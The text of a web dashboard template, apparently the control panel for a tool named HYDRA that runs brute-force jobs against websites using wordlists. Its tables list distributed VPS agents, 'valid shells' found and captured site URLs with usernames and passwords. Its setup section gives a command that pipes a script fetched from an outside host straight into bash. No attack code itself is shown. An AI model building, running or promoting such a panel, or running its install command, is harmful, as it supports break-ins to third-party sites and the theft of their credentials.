Dashboard
{{ stats.vps?.online || 0 }}/{{ stats.vps?.total || 0 }}
VPS Online
{{ stats.shells?.valid || 0 }}
Valid Shells
{{ stats.jobs?.running || 0 }}
Running Jobs
{{ formatNumber(stats.sites_processed || 0) }}
Sites Processed
Agent Setup
Run this command on your VPS to install the HYDRA agent:
curl -sSL https://thehydra.lol/setup.sh | bash
The agent will auto-register and appear in VPS Agents page.
Jobs
| Status | Name | Sites | Progress | Shells | Wordlist | Created | Actions |
|---|---|---|---|---|---|---|---|
| {{ j.status }} | {{ j.name }} | {{ j.total_sites }} |
|
{{ j.shells_found }} | {{ j.wordlist_name || '-' }} | {{ formatTime(j.created_at) }} | |
| No jobs yet | |||||||
VPS Agents
| Status | Hostname | IP | Specs | Shells | Last Heartbeat | Actions |
|---|---|---|---|---|---|---|
| ● {{ v.status }} | {{ v.hostname || '-' }} | {{ v.ip || '-' }} |
{{ v.cpu_cores }} cores / {{ v.ram_gb }}GB - | {{ v.shells_found || 0 }} | {{ formatTime(v.last_heartbeat) }} | |
| No VPS registered yet | ||||||
Shells ({{ shellsTotal }})
| URL | Username | Password | Source | Status | Actions | |
|---|---|---|---|---|---|---|
| {{ truncate(s.url, 50) }} | {{ s.username }} |
{{ s.password }} |
{{ s.source }} | {{ s.status }} | ||
| No shells found | ||||||
Wordlists
| Name | Filename | Words | Uploaded | Actions |
|---|---|---|---|---|
| {{ w.name }} | {{ w.filename }} |
{{ formatNumber(w.word_count) }} | {{ formatTime(w.created_at) }} | |
| No wordlists uploaded yet | ||||